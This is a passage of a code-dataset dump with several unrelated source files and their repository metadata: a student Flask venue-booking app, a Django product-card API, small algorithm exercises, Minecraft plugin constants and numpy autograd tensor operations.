SQLAlchemy\r\nimport logging\r\nfrom logging import Formatter, FileHandler\r\nfrom flask_wtf import Form\r\nfrom forms import *\r\n#----------------------------------------------------------------------------#\r\n# App Config.\r\n#----------------------------------------------------------------------------#\r\n\r\napp = Flask(__name__)\r\nmoment = Moment(app)\r\napp.config.from_object('config')\r\ndb = SQLAlchemy(app)\r\nmigrate = Migrate(app, db)\r\n\r\n# TODO: connect to a local postgresql database\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres: @localhost:5432/fyyurapp'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\n\r\n#----------------------------------------------------------------------------#\r\n# Models.\r\n#----------------------------------------------------------------------------#\r\n\r\nclass Artist (db.Model):\r\n __tablename__ = 'artist'\r\n id = db.Column (db.Integer, primary_key=True)\r\n name = db.Column (db.String(150), nullable=False)\r\n city = db.Column (db.String(150), nullable=False)\r\n state = db.Column (db.String(150), nullable=False)\r\n phone = db.Column (db.String(150), nullable=False)\r\n address = db.Column (db.String(120), nullable=False)\r\n genres = db.Column (db.String(200), nullable=False)\r\n facebook_link = db.Column 
(db.String(120))\r\n image_link = db.Column (db.String(500))\r\n website = db.Column (db.String(150), nullable=False)\r\n shows = db.relationship('Show', backref='artist', lazy=False)\r\n \r\n def __repr__(self):\r\n return f'<Artist {self.id} {self.name}>'\r\n\r\n\r\nclass Venue (db.Model):\r\n __tablename__ = 'venue' \r\n id = db.Column (db.Integer, primary_key=True)\r\n name = db.Column (db.String(150), nullable=False)\r\n city = db.Column (db.String(120), nullable=False)\r\n state = db.Column (db.String(150), nullable=False)\r\n address = db.Column(db.String(120),nullable=False)\r\n phone = db.Column(db.String(120), nullable=False)\r\n genres = db.Column(db.String(300), nullable=False)\r\n facebook_link = db.Column(db.String(120))\r\n image_link = db.Column(db.String(500))\r\n website = db.Column(db.String(120), nullable=False)\r\n shows = db.relationship('Show', backref='venue', lazy=False)\r\n \r\n def __repr__(self):\r\n return f'<Venue {self.id} {self.name}>'\r\n\r\n\r\nclass Show(db.Model):\r\n __tablename__ = 'show'\r\n \r\n id = db.Column(db.Integer, primary_key=True)\r\n date = db.Column(db.DateTime, nullable=False)\r\n artist_id = db.Column(db.Integer, db.ForeignKey(\"artist.id\"), nullable=False)\r\n venue_id = db.Column(db.Integer, db.ForeignKey(\"venue.id\"), nullable=False)\r\n\r\n def __repr__(self):\r\n return f'<Show {self.id} Artist {self.artist_id} Venue {self.venue_id}>'\r\n\r\n\r\n# TODO: implement any missing fields, as a database migration using Flask-Migrate\r\n# TODO Implement Show and Artist models, and complete all model relationships and properties, as a database migration.\r\n\r\n\r\n#----------------------------------------------------------------------------#\r\n# Filters.\r\n#----------------------------------------------------------------------------#\r\n\r\ndef format_datetime(value, format='medium'):\r\n date = dateutil.parser.parse(value)\r\n if format == 'full':\r\n format=\"EEEE MMMM, d, y 'at' h:mma\"\r\n elif format == 'medium':\r\n format=\"EE MM, dd, y h:mma\"\r\n return babel.dates.format_datetime(date, format, locale='en')\r\n\r\napp.jinja_env.filters['datetime'] = format_datetime\r\n\r\n#----------------------------------------------------------------------------#\r\n# Controllers.\r\n#----------------------------------------------------------------------------#\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('pages/home.html')\r\n\r\n\r\n# Venues\r\n# ----------------------------------------------------------------\r\n\r\n@app.route('/venues')\r\ndef venues():\r\n # TODO: replace with real venues data.\r\n # num_upcoming_shows should be aggregated based on number of upcoming shows per venue.\r\n areas = []\r\n data = Venue.query.order_by('city', 'state', 'name').all()\r\n for place in data:\r\n area_item = {}\r\n loc_area = -1\r\n if len(areas) == 0:\r\n loc_area = 0\r\n area_item = {\r\n \"city\" : place.city,\r\n \"state\": place.state,\r\n \"venues\": []\r\n }\r\n areas.append(area_item)\r\n else:\r\n for i, area in enumerate(areas):\r\n if area['city'] == place.city and area['state'] == place.state:\r\n loc_area = i\r\n break\r\n if loc_area < 0:\r\n area_item = {\r\n \"city\": place.city,\r\n \"state\": place.state,\r\n \"venues\": []\r\n }\r\n areas.append(area_item)\r\n loc_area = len(areas) - 1\r\n else:\r\n area_item = areas[loc_area]\r\n v = {\r\n \"id\": place.id,\r\n \"name\": place.name,\r\n \"num_upcoming_shows\": 5\r\n # num_upcoming_shows should be aggregated based on number of upcoming shows per venue.\r\n }\r\n area_item['venues'].append(v)\r\n areas[loc_area] = area_item\r\n\r\n return render_template('pages/venues.html', areas=areas)\r\n \r\n\r\n@app.route('/venues/search', 
methods=['POST'])\r\ndef search_venues():\r\n # TODO: implement search on venues with partial string search. Ensure it is case-insensitive.\r\n # search for Hop should return \"The Musical Hop\".\r\n # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\r\n search_name = request.form.get('search_name')\r\n search = \"%{}%\".format(search_name.replace(\" \", \"\\ \"))\r\n data = Venue.query.filter(Venue.name.match(search)).order_by('name').all()\r\n items = []\r\n for row in data:\r\n aux = {\r\n \"id\": row.id,\r\n \"name\": row.name,\r\n # \"\" :\r\n }\r\n items.append(aux)\r\n\r\n response={\r\n \"count\": len(items),\r\n \"data\": items\r\n }\r\n\r\n return render_template('pages/search_venues.html', results=response, search_name=request.form.get('search_name', ''))\r\n\r\n\r\n@app.route('/venues/<int:venue_id>')\r\ndef show_venue(venue_id):\r\n # shows the venue page with the given venue_id\r\n # TODO: replace with real venue data from the venues table, using venue_id\r\n data = Venue.query.filter_by(id=venue_id).first()\r\n data.genres = json.loads(data.genres)\r\n upcoming_shows = []\r\n past_shows = []\r\n for show in data.shows:\r\n if show.date > datetime.now():\r\n upcoming_shows.append(show)\r\n else:\r\n past_shows.append(show)\r\n data.upcoming_shows = upcoming_shows\r\n data.past_shows = past_shows\r\n\r\n return render_template('pages/show_venue.html', venue=data)\r\n\r\n\r\n# Create Venue\r\n# ----------------------------------------------------------------\r\n\r\n@app.route('/venues/create', methods=['GET'])\r\ndef create_venue_form():\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n form = VenueForm()\r\n return render_template('forms/new_venue.html', form=form)\r\n\r\n@app.route('/venues/create', methods=['POST'])\r\ndef create_venue_submission():\r\n # TODO: insert form data as a new Venue record in the db, instead\r\n # TODO: modify data to be the data object returned from db insertion\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n error = False\r\n body = {}\r\n request_data = request.get_json()\r\n try:\r\n name = request_data['name']\r\n city = request_data['city']\r\n state = request_data['state']\r\n phone = request_data['phone']\r\n address = request_data['address']\r\n genres = json.dumps(request_data['genres'])\r\n facebook_link = request_data['facebook_link']\r\n image_link = request_data['image_link']\r\n website = request_data['website']\r\n venue = Venue(name=name, city=city, state=state, phone=phone, address=address, genres=genres, facebook_link=facebook_link, image_link=image_link, website=website)\r\n db.session.add(venue)\r\n db.session.commit()\r\n except:\r\n db.session.rollback()\r\n error = True\r\n print(sys.exc_info())\r\n finally:\r\n db.session.close()\r\n if error:\r\n abort(500)\r\n body['success'] = False\r\n flash('An error occurred. Venue ' + request_data['name'] + ' could not be listed.')\r\n body['msg'] = 'An error occurred'\r\n else:\r\n # on successful db insert, flash success\r\n body['success'] = True\r\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\r\n \r\n return jsonify(body)\r\n\r\n\r\n\r\n # TODO: on unsuccessful db insert, flash an error instead.\r\n # e.g., flash('An error occurred. 
Venue ' + data.name + ' could not be listed.')\r\n # see: http://flask.pocoo.org/docs/1.0/patterns/flashing/\r\n\r\n@app.route('/venues/<venue_id>', methods=['DELETE'])\r\ndef delete_venue(venue_id):\r\n # TODO: Complete this endpoint for taking a venue_id, and using\r\n data = Venue.query.filter_by(id=venue_id).delete()\r\n\r\n # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\r\n\r\n # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\r\n # clicking that button delete it from the db then redirect the user to the homepage\r\n \r\n\r\n# Artists\r\n# ----------------------------------------------------------------\r\n@app.route('/artists')\r\ndef artists():\r\n # TODO: replace with real data returned from querying the database\r\n data = Artist.query.order_by('name').all()\r\n return render_template('pages/artists.html', artists=data)\r\n\r\n@app.route('/artists/search', methods=['POST'])\r\ndef search_artists():\r\n # TODO: implement search on artists with partial string search. Ensure it is case-insensitive.\r\n # search for \"A\" should return \"Guns N Petals\", \"Matt Quevado\", and \"The Wild Sax Band\".\r\n # search for \"band\" should return \"The Wild Sax Band\".\r\n \r\n search_term = request.form.get('search_term')\r\n search = \"%{}%\".format(search_term.replace(\" \", \"\\ \"))\r\n data = Artist.query.filter(Artist.name.match(search)).order_by('name').all()\r\n items = []\r\n for row in data:\r\n aux = {\r\n \"id\": row.id,\r\n \"name\": row.name,\r\n \"num_upcoming_shows\": len(row.shows)\r\n }\r\n items.append(aux)\r\n response={\r\n \"count\": len(items),\r\n \"data\": items\r\n }\r\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\r\n\r\n\r\n@app.route('/artists/<int:artist_id>')\r\ndef show_artist(artist_id):\r\n # shows the artist page with the given artist_id\r\n # TODO: replace with real artist data from the artist table, using artist_id\r\n data = Artist.query.filter_by(id=artist_id).first()\r\n data.genres = json.loads(data.genres)\r\n\r\n upcoming_shows = []\r\n past_shows = []\r\n for show in data.shows:\r\n if show.date > datetime.now():\r\n upcoming_shows.append(show)\r\n else:\r\n past_shows.append(show)\r\n data.upcoming_shows = upcoming_shows\r\n data.past_shows = past_shows\r\n\r\n return render_template('pages/show_artist.html', artist=data)\r\n\r\n\r\n# Update\r\n# ----------------------------------------------------------------\r\n@app.route('/artists/<int:artist_id>/edit', methods=['GET'])\r\ndef edit_artist(artist_id):\r\n form = ArtistForm()\r\n artist= Artist.query.filter_by(id=artist_id).first()\r\n\r\n form.name.data = artist.name\r\n form.city.data = artist.city\r\n form.state.data = artist.state\r\n form.phone.data = artist.phone\r\n form.facebook_link.data = artist.facebook_link\r\n form.website.data = artist.website\r\n form.image_link.data = artist.image_link\r\n form.genres.data = json.loads(artist.genres)\r\n # TODO: populate form with fields from artist with ID <artist_id>\r\n \r\n return render_template('forms/edit_artist.html', form=form, artist=artist)\r\n\r\n@app.route('/artists/<int:artist_id>/edit', methods=['POST'])\r\ndef edit_artist_submission(artist_id):\r\n # TODO: take values from the form submitted, and update existing\r\n # artist record with ID <artist_id> using the new attributes\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n error = False\r\n body = {}\r\n request_data = request.get_json()\r\n try:\r\n artist = Artist.query.filter_by(id=artist_id).first()\r\n 
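# Copy each editable field from the JSON payload onto the fetched row; 'genres' is re-encoded with json.dumps to match how the column is stored.\r\n 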
artist.name = request_data['name']\r\n artist.city = request_data['city']\r\n artist.state = request_data['state']\r\n artist.phone = request_data['phone']\r\n artist.genres = json.dumps(request_data['genres'])\r\n artist.facebook_link = request_data['facebook_link']\r\n artist.website = request_data['website']\r\n artist.image_link = request_data['image_link']\r\n db.session.add(artist)\r\n db.session.commit()\r\n except:\r\n db.session.rollback()\r\n error = True\r\n print(sys.exc_info())\r\n finally:\r\n db.session.close()\r\n if error:\r\n abort(500)\r\n body['success'] = False\r\n body['msg'] = 'There was an error'\r\n else:\r\n body['msg'] = 'The update was successful'\r\n body['success'] = True\r\n\r\n return jsonify(body)\r\n return redirect(url_for('show_artist', artist_id=artist_id))\r\n\r\n@app.route('/venues/<int:venue_id>/edit', methods=['GET'])\r\ndef edit_venue(venue_id):\r\n form = VenueForm()\r\n place = Venue.query.filter_by(id=venue_id).first()\r\n\r\n form.name.data = place.name\r\n form.city.data = place.city\r\n form.state.data = place.state\r\n form.phone.data = place.phone\r\n form.address.data = place.address\r\n form.facebook_link.data = place.facebook_link\r\n form.website.data = place.website\r\n form.image_link.data = place.image_link\r\n form.genres.data = json.loads(place.genres)\r\n \r\n return render_template('forms/edit_venue.html', form=form, place=place)\r\n\r\n # TODO: populate form with values from venue with ID <venue_id>\r\n\r\n@app.route('/venues/<int:venue_id>/edit', methods=['POST'])\r\ndef edit_venue_submission(venue_id):\r\n # TODO: take values from the form submitted, and update existing\r\n # venue record with ID <venue_id> using the new attributes\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n error = False\r\n body = {}\r\n request_data = request.get_json()\r\n try:\r\n place = Venue.query.filter_by(id=venue_id).first()\r\n place.name = request_data['name']\r\n place.city = request_data['city']\r\n place.state = request_data['state']\r\n place.phone = request_data['phone']\r\n place.address = request_data['address']\r\n place.genres = json.dumps(request_data['genres'])\r\n place.facebook_link = request_data['facebook_link']\r\n place.website = request_data['website']\r\n place.image_link = request_data['image_link']\r\n db.session.add(place)\r\n db.session.commit()\r\n except:\r\n db.session.rollback()\r\n error = True\r\n print(sys.exc_info())\r\n finally:\r\n db.session.close()\r\n if error:\r\n abort(500)\r\n body['success'] = False\r\n body['msg'] = 'There was an error'\r\n else:\r\n body['msg'] = 'The update was successful'\r\n body['success'] = True\r\n \r\n return jsonify(body)\r\n return redirect(url_for('show_venue', venue_id=venue_id))\r\n\r\n# Create Artist\r\n# ----------------------------------------------------------------\r\n\r\n@app.route('/artists/create', methods=['GET'])\r\ndef create_artist_form():\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n form = ArtistForm()\r\n return render_template('forms/new_artist.html', form=form)\r\n\r\n\r\n@app.route('/artists/create', methods=['POST'])\r\ndef create_artist_submission():\r\n # called upon submitting the new artist listing form\r\n # TODO: insert form data as a new Venue record in the db, instead\r\n # TODO: modify data to be the data object returned from db insertion\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n error = False\r\n body = {}\r\n request_data = request.get_json()\r\n\r\n\r\n # on successful db insert, flash success\r\n flash('Artist ' + request.form['name'] + ' was successfully 
listed!')\r\n # TODO: on unsuccessful db insert, flash an error instead.\r\n # e.g., flash('An error occurred. Artist ' + data.name + ' could not be listed.')\r\n\r\n\r\n# Shows\r\n# ----------------------------------------------------------------\r\n\r\n@app.route('/shows')\r\ndef shows():\r\n # displays list of shows at /shows\r\n # TODO: replace with real venues data.\r\n rows = db.session.query(Show, Artist, Venue).join(Artist).join(Venue).filter(Show.date > datetime.now()).order_by('date').all()\r\n data = []\r\n for row in rows:\r\n item = {\r\n 'venue_id': row.Venue.id,\r\n 'artist_id': row.Artist.id,\r\n 'venue_name': row.Venue.name,\r\n 'artist_name': row.Artist.name,\r\n 'artist_image_link': row.Artist.image_link,\r\n 'start_time': row.Show.date.strftime('%Y-%m-%d %H:%M')\r\n }\r\n data.append(item)\r\n \r\n return render_template('pages/shows.html', shows=data)\r\n \r\n\r\n\r\n@app.route('/shows/create')\r\ndef create_shows():\r\n # renders form. do not touch.\r\n form = ShowForm()\r\n return render_template('forms/new_show.html', form=form)\r\n\r\n\r\n@app.route('/shows/create', methods=['POST'])\r\ndef create_show_submission():\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n error = False\r\n body = {}\r\n request_data = request.get_json()\r\n try:\r\n artist_id = request_data['artist_id']\r\n venue_id = request_data['venue_id']\r\n start_time = request_data['start_time']\r\n\r\n show = Show(artist_id=artist_id, venue_id=venue_id, date=start_time)\r\n db.session.add(show)\r\n db.session.commit()\r\n except:\r\n db.session.rollback()\r\n error = True\r\n print(sys.exc_info())\r\n finally:\r\n db.session.close()\r\n if error:\r\n abort(500)\r\n body['success'] = False\r\n body['msg'] = 'There was an error'\r\n else:\r\n # on successful db insert, flash success\r\n body['success'] = True\r\n flash('Show was successfully listed!')\r\n body['msg'] = 'The show was created successfully'\r\n\r\n return jsonify(body)\r\n\r\n\r\n \r\n # TODO: on unsuccessful db insert, flash an error instead.\r\n # e.g., flash('An error occurred. 
Show could not be listed.')\r\n # see: http://flask.pocoo.org/docs/1.0/patterns/flashing/\r\n# return render_template('pages/home.html')\r\n\r\n@app.errorhandler(404)\r\ndef not_found_error(error):\r\n return render_template('errors/404.html'), 404\r\n\r\n@app.errorhandler(500)\r\ndef server_error(error):\r\n return render_template('errors/500.html'), 500\r\n\r\n\r\nif not app.debug:\r\n file_handler = FileHandler('error.log')\r\n file_handler.setFormatter(\r\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\r\n )\r\n app.logger.setLevel(logging.INFO)\r\n file_handler.setLevel(logging.INFO)\r\n app.logger.addHandler(file_handler)\r\n app.logger.info('errors')\r\n\r\n\r\n\r\n#----------------------------------------------------------------------------#\r\n# Launch.\r\n#----------------------------------------------------------------------------#\r\n\r\n# Default port:\r\nif __name__ == '__main__':\r\n port = int(os.environ.get('PORT', 3000))\r\n app.run(host='0.0.0.0', port=port)\r\n\r\n# Or specify port manually:\r\n'''\r\nif __name__ == '__main__':\r\n port = int(os.environ.get('PORT', 5000))\r\n app.run(host='0.0.0.0', port=port)\r\n'''\r\n","repo_name":"wildabyss37/fyyur_app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":19729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14050453061","text":"from collections import deque\n\ndef solution(prices):\n answer = []\n \n q = deque(prices)\n while q:\n time = 0\n now = q.popleft()\n for p in q:\n time += 1\n if now > p:\n break\n answer.append(time)\n \n return answer","repo_name":"ktaehyun/prepare_codingtest","sub_path":"프로그래머스/lv2/42584. 주식가격/주식가격.py","file_name":"주식가격.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"73649231923","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework import status\n\n\nfrom util.scrape import get_all_good_info\nfrom users.auth import authenticate_jwt\nfrom util.stats import set_time_values, get_stats_list, filter_records, validate_url_query_params\nfrom .models import Card, Record\nfrom .serializers import CardSerializer\nfrom main.celery import celery_app\n\n\nclass AllCardsView(APIView):\n def get(self, request):\n payload = authenticate_jwt(request)\n user_id = payload.get('id')\n user_cards = Card.objects.filter(user_id=user_id)\n\n data = []\n for card in user_cards:\n serializer = CardSerializer(card)\n data.append(serializer.data)\n\n return Response(data, status=status.HTTP_200_OK)\n\n def post(self, request):\n payload = authenticate_jwt(request)\n user_id = payload.get('id')\n\n articul = request.data.get('articul')\n if not articul:\n raise ValidationError(dict(message='Need articul field'))\n\n if not articul.isdigit():\n raise ValidationError(dict(message='Articul must be a number'))\n\n good_info = get_all_good_info(articul)\n\n if not good_info:\n raise ValidationError(dict(message='Non-existing articul'))\n\n data = {\n 'user_id': user_id,\n **good_info,\n }\n serializer = CardSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n def delete(self, request):\n payload = authenticate_jwt(request)\n user_id = payload['id']\n\n user_cards = 
Card.objects.filter(user_id=user_id)\n for card in user_cards:\n card.delete()\n\n return Response(dict(message='All cards deleted'), status=status.HTTP_204_NO_CONTENT)\n\n\nclass SingleCardView(APIView):\n def delete(self, request, pk):\n payload = authenticate_jwt(request)\n user_id = payload['id']\n\n user_card = Card.objects.filter(user_id=user_id).filter(id=pk)\n user_card.delete()\n\n return Response(dict(message=f'Card with id {pk} deleted'), status=status.HTTP_204_NO_CONTENT)\n\n\nclass UpdateInfoView(APIView):\n def get(self, request):\n celery_app.send_task('cards.tasks.get_and_update_good_info')\n return Response(dict(message='Task for updating is sent'), status=status.HTTP_200_OK)\n\n\nclass CardStatsView(APIView):\n def get(self, request, pk):\n payload = authenticate_jwt(request)\n user_id = payload['id']\n user_card = Card.objects.filter(id=pk).first()\n\n if not user_card:\n return Response(dict(message=f'Card with id {pk} not found'), status=status.HTTP_404_NOT_FOUND)\n\n if not user_card.user_id == user_id:\n return Response(dict(message=f'It is not your card'), status.HTTP_403_FORBIDDEN)\n\n records = Record.objects.filter(articul=user_card.articul)\n start_date, end_date, interval = validate_url_query_params(self.request.query_params)\n\n records = filter_records(records, start_date, end_date)\n time_to_check, time_last, time_interval = set_time_values(records, interval)\n stats = get_stats_list(records, time_to_check, time_last, time_interval)\n\n return Response(dict(\n articul=user_card.articul,\n stats=stats,\n ), status=status.HTTP_200_OK)\n","repo_name":"genndy007/wb_scraper","sub_path":"src/cards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40854352664","text":"from chapter_3.datastructs import Stack\n\nclass MyQueue:\n def __init__(self):\n # instance-level stacks, so separate queues don't share state\n self.s_in = Stack()\n self.s_out = Stack()\n \n def push(self, elem: int):\n self.s_in.push(elem)\n\n def pop(self):\n if self.s_out.isEmpty():\n self._pour(self.s_in, self.s_out)\n return self.s_out.pop()\n\n def isEmpty(self):\n return self.s_in.isEmpty() and self.s_out.isEmpty()\n\n def peek(self):\n if self.s_out.isEmpty():\n self._pour(self.s_in, self.s_out)\n return self.s_out.peek()\n\n def size(self):\n return self.s_in.size + self.s_out.size\n \n @staticmethod\n def _pour(s_from:Stack, s_to:Stack):\n while not s_from.isEmpty():\n s_to.push(s_from.pop())\n \n def __str__(self):\n return f\"Ha! I'm actually 2 stacks: {self.s_in} and {self.s_out}\"\n\n\ndef test_myQueue():\n myq = MyQueue()\n for i in range(5):\n myq.push(i)\n \n print(f\"Is empty ? {myq.isEmpty()} ---> {myq}\")\n\n for i in range(5):\n print(myq.pop())\n \n try:\n myq.pop()\n except Exception as e:\n print(f\"Oh no, got {e}, but queue has elem ? 
{not myq.isEmpty()}\")\n\n for i in range(10,15):\n myq.push(i) \n \n print(myq.pop())\n\n for i in range(15,20):\n myq.push(i) \n print(myq)\n\nif __name__ == '__main__':\n test_myQueue()\n ","repo_name":"StBogdan/CTCI_python","sub_path":"chapter_3/p3_4.py","file_name":"p3_4.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":317,"dataset":"github-code","pt":"75"} +{"seq_id":"18667482979","text":"from mcdreforged.api.rtext import RTextTranslation, RColor\n\nCONFIG_FILE_NAME = 'config.json'\nDATA_FILE_NAME = 'botList.json'\n\n\nclass DIMENSION:\n OVERWORLD = 0\n THE_NETHER = -1\n THE_END = 1\n\n DISPLAY_TRANSLATION = {\n 0: RTextTranslation(\n 'createWorld.customize.preset.overworld',\n color=RColor.green\n ),\n -1: RTextTranslation(\n 'advancements.nether.root.title',\n color=RColor.dark_red\n ),\n 1: RTextTranslation(\n 'advancements.end.root.title',\n color=RColor.light_purple\n )\n }\n USING_TRANSLATION = {\n 0: 'minecraft:overworld',\n -1: 'minecraft:the_nether',\n 1: 'minecraft:the_end'\n }\n COMMAND_TRANSLATION = {\n '0': OVERWORLD,\n '-1': THE_NETHER,\n '1': THE_END,\n 'overworld': OVERWORLD,\n 'the_nether': THE_NETHER,\n 'the_end': THE_END,\n 'minecraft:overworld': OVERWORLD,\n 'minecraft:the_nether': THE_NETHER,\n 'minecraft:the_end': THE_END,\n 'nether': THE_NETHER,\n 'end': THE_END\n }\n","repo_name":"AnzhiZhang/MCDReforgedPlugins","sub_path":"bot/bot/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"75"} +{"seq_id":"18206761302","text":"from __future__ import annotations\nimport numpy as np\nfrom typing import List, Tuple, Union\n\nfrom .operation import Operation\nfrom .. 
import tensor\n\n\nclass TensorContraction(Operation):\n \"\"\"f(inputs) = tensordot(inputs[0], inputs[1], axes)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axes: int):\n super().__init__(inputs)\n self.axes = axes\n \n \n def _forward(self):\n (a, b) = self.inputs\n return tensor.Tensor(np.tensordot(a.data, b.data, axes=self.axes))\n \n \n def _backward(self,\n output_grad: np.array):\n (a, b) = self.inputs\n \n left_dim = len(a.data.shape) - self.axes\n right_dim = len(b.data.shape) - self.axes\n\n input_grad_a = np.tensordot(output_grad, b.data, axes=[range(-1, -right_dim - 1, -1)] * 2)\n input_grad_b = np.tensordot(a.data, output_grad, axes=[range(left_dim)] * 2)\n\n return (input_grad_a, input_grad_b)\n \n \nclass TensorSum(Operation):\n \"\"\"f(inputs) = inputs[0].sum(axis, keepdims)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axis: Union[int, Tuple[int, int]] = None,\n keepdims: bool = False):\n super().__init__(inputs)\n if type(axis) is int:\n axis = (axis,)\n if axis is None:\n axis = tuple(range(len(self.inputs[0].shape)))\n \n self.axis = axis\n self.keepdims = keepdims\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.sum(axis=self.axis, keepdims=self.keepdims))\n \n \n def _backward(self,\n output_grad: np.array):\n if not self.keepdims:\n output_grad = np.expand_dims(output_grad, axis=self.axis)\n \n input_grad = np.broadcast_to(output_grad, shape=self.inputs[0].shape)\n \n return (input_grad,)\n \n \nclass TensorMax(Operation):\n \"\"\"f(inputs) = inputs[0].max(axis, keepdims)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axis: Union[int, Tuple[int, int]] = None,\n keepdims: bool = False):\n super().__init__(inputs)\n if type(axis) is int:\n axis = (axis,)\n if axis is None:\n axis = tuple(range(len(self.inputs[0].shape)))\n \n self.axis = axis\n self.keepdims = keepdims\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.max(axis=self.axis, keepdims=self.keepdims))\n \n \n def _backward(self,\n output_grad: np.array):\n output = self.output.data\n\n if not self.keepdims:\n output_grad = np.expand_dims(output_grad, axis=self.axis)\n output = np.expand_dims(output, axis=self.axis)\n\n mask = self.inputs[0].data == np.broadcast_to(output, self.inputs[0].shape)\n\n input_grad = mask * np.broadcast_to(output_grad, shape=self.inputs[0].shape)\n \n return (input_grad,)\n \n \nclass TensorMin(Operation):\n \"\"\"f(inputs) = inputs[0].min(axis, keepdims)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axis: Union[int, Tuple[int, int]] = None,\n keepdims: bool = False):\n super().__init__(inputs)\n if type(axis) is int:\n axis = (axis,)\n if axis is None:\n axis = tuple(range(len(self.inputs[0].shape)))\n \n self.axis = axis\n self.keepdims = keepdims\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.min(axis=self.axis, keepdims=self.keepdims))\n \n \n def _backward(self,\n output_grad: np.array):\n output = self.output.data\n\n if not self.keepdims:\n output_grad = np.expand_dims(output_grad, axis=self.axis)\n output = np.expand_dims(output, axis=self.axis)\n\n mask = self.inputs[0].data == np.broadcast_to(output, self.inputs[0].shape)\n\n input_grad = mask * np.broadcast_to(output_grad, shape=self.inputs[0].shape)\n \n return (input_grad,)\n \n \nclass TensorSlice(Operation):\n \"\"\"f(inputs) = inputs[0][key]\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n key):\n 
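# Note: the gradient of a slice is a scatter: _backward below writes output_grad into the sliced positions of a zero array shaped like the input.\n 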
super().__init__(inputs)\n if type(key) is not tuple:\n key = (key,)\n\n # If any elements in key are Tensor, convert to np.array\n key = tuple(k.data if isinstance(k, tensor.Tensor) else k for k in key)\n \n # Numpy slicing is quite involved and it's hard to cover every edge case\n # For now, we guarantee backprop supports slicing with ints, slices, boolean mask,\n # and a single leading 2D list, e.g. x[[[0, 1, 2], [5, 2, 3]], 2, :, 2:5:-1].\n # This covers most practical cases.\n for key_i in key[1:]:\n assert self._is_valid_slice(key_i)\n\n self.key = key\n self.key0_ndim = self._1d_or_2d_int_list(key[0])\n assert self._is_valid_slice(key[0]) or self.key0_ndim != -1 \n\n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data[self.key])\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad = np.zeros(self.inputs[0].shape, dtype=tensor.Tensor.DEFAULT_DTYPE)\n\n if self.key0_ndim == -1:\n input_grad[self.key] = output_grad\n\n else:\n for (i, subarray) in enumerate(self.key[0]):\n input_grad[(subarray,) + self.key[1:]] += output_grad[i]\n\n return (input_grad,)\n \n\n def _is_valid_slice(self, s):\n \"\"\"Slice is valid if None, int, slice, or boolean mask.\"\"\"\n if s is None:\n return True\n if isinstance(s, (np.integer, int, slice)):\n return True\n if np.array(s).dtype == bool:\n return True\n return False\n\n \n def _1d_or_2d_int_list(self, s):\n \"\"\"Returns 2 if 2d int list, 1 if 1d int list, -1 if neither.\"\"\"\n s = np.array(s)\n if s.dtype == int and s.ndim in [1, 2]:\n return s.ndim\n else:\n return -1\n\n\nclass TensorSetSlice(Operation):\n \"\"\"output = inputs[0]; output[key] = inputs[1]; f(inputs) = output\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n key):\n super().__init__(inputs)\n if type(key) is not tuple:\n key = (key,)\n\n # If any elements in key are Tensor, convert to np.array\n key = tuple(k.data if isinstance(k, tensor.Tensor) else k for k in key)\n \n self.key = key\n \n \n def _forward(self):\n (a, b) = [i.data for i in self.inputs]\n a = a.copy() # Todo: make this operation in-place\n a[self.key] = b\n return tensor.Tensor(a)\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad_a = output_grad.copy()\n input_grad_a[self.key] = 0\n input_grad_b = output_grad[self.key]\n return (input_grad_a, input_grad_b)\n \n \nclass TensorReshape(Operation):\n \"\"\"f(inputs) = inputs[0].reshape(new_shape)\"\"\"\n\n def __init__(self,\n inputs: List[Tensor],\n new_shape: Tuple[int]):\n super().__init__(inputs)\n self.new_shape = new_shape\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.reshape(self.new_shape))\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad = output_grad.reshape(self.inputs[0].shape)\n \n return 